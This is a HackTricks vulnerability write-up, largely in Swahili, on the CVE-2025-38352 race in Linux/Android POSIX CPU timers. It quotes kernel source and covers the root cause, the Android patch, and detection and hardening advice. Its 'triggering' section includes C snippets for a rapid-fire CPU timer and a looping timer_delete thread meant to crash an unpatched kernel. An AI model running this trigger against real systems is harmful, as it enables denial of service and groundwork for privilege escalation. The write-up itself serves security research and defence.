POSIX CPU Timers TOCTOU race (CVE-2025-38352)
Reading time: 8 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Ukurasa huu unaelezea hali ya ushindani ya TOCTOU katika Linux/Android POSIX CPU timers ambayo inaweza kuharibu hali ya timer na kusababisha kernel kuanguka (crash), na kwa baadhi ya mazingira inaweza kuelekezwa kuelekea privilege escalation.
- Sehemu inayohusika: kernel/time/posix-cpu-timers.c
- Primitive: expiry vs deletion race under task exit
- Inategemea usanidi: CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n (IRQ-context expiry path)
Muhtasari mfupi wa ndani (muhimu kwa exploitation)
- Masaa matatu ya CPU yanaendesha uhasibu wa timers kupitia cpu_clock_sample():
- CPUCLOCK_PROF: utime + stime
- CPUCLOCK_VIRT: utime only
- CPUCLOCK_SCHED: task_sched_runtime()
- Uundaji wa timer huunganisha timer na task/pid na huanzisha timerqueue nodes:
static int posix_cpu_timer_create(struct k_itimer *new_timer) {
struct pid *pid;
rcu_read_lock();
pid = pid_for_clock(new_timer->it_clock, false);
if (!pid) { rcu_read_unlock(); return -EINVAL; }
new_timer->kclock = &clock_posix_cpu;
timerqueue_init(&new_timer->it.cpu.node);
new_timer->it.cpu.pid = get_pid(pid);
rcu_read_unlock();
return 0;
}
- Arming huingiza kwenye per-base timerqueue na inaweza kusasisha next-expiry cache:
static void arm_timer(struct k_itimer *timer, struct task_struct *p) {
struct posix_cputimer_base *base = timer_base(timer, p);
struct cpu_timer *ctmr = &timer->it.cpu;
u64 newexp = cpu_timer_getexpires(ctmr);
if (!cpu_timer_enqueue(&base->tqhead, ctmr)) return;
if (newexp < base->nextevt) base->nextevt = newexp;
}
- Njia ya haraka huzuia usindikaji wa gharama kubwa isipokuwa maliziko yaliyohifadhiwa yanaonyesha uwezekano wa kutekelezwa:
static inline bool fastpath_timer_check(struct task_struct *tsk) {
struct posix_cputimers *pct = &tsk->posix_cputimers;
if (!expiry_cache_is_inactive(pct)) {
u64 samples[CPUCLOCK_MAX];
task_sample_cputime(tsk, samples);
if (task_cputimers_expired(samples, pct))
return true;
}
return false;
}
- Expiration hukusanya taimeri zilizokwisha, huzitambua kama zimetumwa (firing), huzihamisha nje ya foleni; utolewaji halisi umecheleweshwa:
#define MAX_COLLECTED 20
static u64 collect_timerqueue(struct timerqueue_head *head,
struct list_head *firing, u64 now) {
struct timerqueue_node *next; int i = 0;
while ((next = timerqueue_getnext(head))) {
struct cpu_timer *ctmr = container_of(next, struct cpu_timer, node);
u64 expires = cpu_timer_getexpires(ctmr);
if (++i == MAX_COLLECTED || now < expires) return expires;
ctmr->firing = 1; // critical state
rcu_assign_pointer(ctmr->handling, current);
cpu_timer_dequeue(ctmr);
list_add_tail(&ctmr->elist, firing);
}
return U64_MAX;
}
Njia mbili za usindikaji wa kumalizika
- CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y: kumalizika kunacheleweshwa kupitia task_work kwenye target task
- CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n: kumalizika kunashughulikiwa moja kwa moja katika IRQ context
void run_posix_cpu_timers(void) {
struct task_struct *tsk = current;
__run_posix_cpu_timers(tsk);
}
#ifdef CONFIG_POSIX_CPU_TIMERS_TASK_WORK
static inline void __run_posix_cpu_timers(struct task_struct *tsk) {
if (WARN_ON_ONCE(tsk->posix_cputimers_work.scheduled)) return;
tsk->posix_cputimers_work.scheduled = true;
task_work_add(tsk, &tsk->posix_cputimers_work.work, TWA_RESUME);
}
#else
static inline void __run_posix_cpu_timers(struct task_struct *tsk) {
lockdep_posixtimer_enter();
handle_posix_cpu_timers(tsk); // IRQ-context path
lockdep_posixtimer_exit();
}
#endif
Katika njia ya IRQ-context, firing list inashughulikiwa nje ya sighand
static void handle_posix_cpu_timers(struct task_struct *tsk) {
struct k_itimer *timer, *next; unsigned long flags, start;
LIST_HEAD(firing);
if (!lock_task_sighand(tsk, &flags)) return; // may fail on exit
do {
start = READ_ONCE(jiffies); barrier();
check_thread_timers(tsk, &firing);
check_process_timers(tsk, &firing);
} while (!posix_cpu_timers_enable_work(tsk, start));
unlock_task_sighand(tsk, &flags); // race window opens here
list_for_each_entry_safe(timer, next, &firing, it.cpu.elist) {
int cpu_firing;
spin_lock(&timer->it_lock);
list_del_init(&timer->it.cpu.elist);
cpu_firing = timer->it.cpu.firing; // read then reset
timer->it.cpu.firing = 0;
if (likely(cpu_firing >= 0)) cpu_timer_fire(timer);
rcu_assign_pointer(timer->it.cpu.handling, NULL);
spin_unlock(&timer->it_lock);
}
}
Root cause: TOCTOU kati ya kuisha kwa wakati wa IRQ na kuondolewa kwa pamoja wakati wa task exit
Preconditions
- CONFIG_POSIX_CPU_TIMERS_TASK_WORK is disabled (njia ya IRQ inatumika)
- The target task inatoka lakini haijachukuliwa kabisa
- Another thread kwa wakati mmoja inaita posix_cpu_timer_del() kwa timer ile ile
Sequence
- update_process_times() husababisha run_posix_cpu_timers() katika muktadha wa IRQ kwa task inayotoka.
- collect_timerqueue() inaweka ctmr->firing = 1 na kuhamisha timer kwenye orodha ya muda ya firing.
- handle_posix_cpu_timers() inaondoa sighand kupitia unlock_task_sighand() ili kusafirisha timers nje ya lock.
- Mara tu baada ya unlock, task inayotoka inaweza kuondolewa; thread ndugu inatekeleza posix_cpu_timer_del().
- Katika dirisha hili, posix_cpu_timer_del() inaweza kushindwa kupata state kupitia cpu_timer_task_rcu()/lock_task_sighand() na hivyo kuruka mlinzi wa kawaida wa in-flight unaokagua timer->it.cpu.firing. Ufutaji unaendelea kana kwamba hauna firing, ukaharibu state wakati expiry inashughulikiwa, kusababisha crashes/UB.
Why TASK_WORK mode is safe by design
- With CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y, expiry inaahirishwa kwa task_work; exit_task_work inakimbia kabla ya exit_notify, hivyo kuingiliana kwa wakati wa IRQ na kuondolewa hakutokee.
- Hata hivyo, ikiwa task tayari inapotoka, task_work_add() inashindwa; kuegemea kwenye exit_state hufanya mode zote mbili ziwe sambamba.
Fix (Android common kernel) and rationale
- Add an early return if current task is exiting, gating all processing:
// kernel/time/posix-cpu-timers.c (Android common kernel commit 157f357d50b5038e5eaad0b2b438f923ac40afeb)
if (tsk->exit_state)
return;
- Hili linazuia kuingia handle_posix_cpu_timers() kwa kazi zinazoondoka, likiondoa dirisha ambapo posix_cpu_timer_del() inaweza kukosa it.cpu.firing na kushindana na usindikaji wa kumalizika.
Athari
- Uharibifu wa kumbukumbu ya kernel wa muundo za timer wakati wa kumalizika/futwa kwa wakati mmoja unaweza kusababisha crash mara moja (DoS) na ni njia-msingi yenye nguvu kuelekea privilege escalation kutokana na fursa za kuathiri arbitrary kernel-state.
Kusababisha hitilafu (hali salama, zinazoweza kurudiwa) Ujenzi/konfig
- Hakikisha CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n na tumia kernel isiyo na marekebisho ya exit_state gating.
Mkakati wa runtime
- Lenga thread ambayo iko karibu kuondoka na uambatise CPU timer kwake (per-thread au process-wide clock):
- For per-thread: timer_create(CLOCK_THREAD_CPUTIME_ID, ...)
- For process-wide: timer_create(CLOCK_PROCESS_CPUTIME_ID, ...)
- Iamsha kwa muda mfupi sana wa kumalizika wa awali na kipindi kidogo ili kuongeza idadi ya kuingia za IRQ-path:
static timer_t t;
static void setup_cpu_timer(void) {
struct sigevent sev = {0};
sev.sigev_notify = SIGEV_SIGNAL; // delivery type not critical for the race
sev.sigev_signo = SIGUSR1;
if (timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &t)) perror("timer_create");
struct itimerspec its = {0};
its.it_value.tv_nsec = 1; // fire ASAP
its.it_interval.tv_nsec = 1; // re-fire
if (timer_settime(t, 0, &its, NULL)) perror("timer_settime");
}
- Kutoka kwa thread ya ndugu, futa kwa wakati mmoja timer ile ile wakati thread lengwa inatoka:
void *deleter(void *arg) {
for (;;) (void)timer_delete(t); // hammer delete in a loop
}
- Race amplifiers: kiwango cha juu cha scheduler tick, mzigo wa CPU, mizunguko ya repeated thread exit/re-create. The crash typically manifests when posix_cpu_timer_del() skips noticing firing due to failing task lookup/locking right after unlock_task_sighand().
Utambuzi na kuimarisha
- Kupunguza athari: tumia exit_state guard; pendelea kuwezesha CONFIG_POSIX_CPU_TIMERS_TASK_WORK inapowezekana.
- Uwezo wa ufuatiliaji: ongeza tracepoints/WARN_ONCE karibu na unlock_task_sighand()/posix_cpu_timer_del(); toa tahadhari wakati it.cpu.firing==1 inapoonekana pamoja na kushindwa kwa cpu_timer_task_rcu()/lock_task_sighand(); angalia kwa kutokuelewana kwa timerqueue karibu na task exit.
Sehemu za ukaguzi (kwa wakaguzi)
- update_process_times() → run_posix_cpu_timers() (IRQ)
- __run_posix_cpu_timers() selection (TASK_WORK vs IRQ path)
- collect_timerqueue(): inaweka ctmr->firing na inasogeza nodes
- handle_posix_cpu_timers(): inaondoa sighand kabla ya firing loop
- posix_cpu_timer_del(): inategemea it.cpu.firing kugundua in-flight expiry; ukaguzi huu unarukuliwa wakati task lookup/lock inashindwa wakati wa exit/reap
Maelezo kwa exploitation research
- Tabia iliyofichuliwa ni primitive thabiti ya kernel crash; kuibadilisha kuwa privilege escalation kawaida kunahitaji overlap ya ziada inayoweza kudhibitiwa (object lifetime au write-what-where influence) zaidi ya wigo wa muhtasari huu. Chukulia PoC yoyote kama inayoweza kusababisha kutegemeka na iendeshe tu katika emulators/VMs.
References
- Race Against Time in the Kernel’s Clockwork (StreyPaws)
- Android security bulletin – September 2025
- Android common kernel patch commit 157f357d50b5…
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.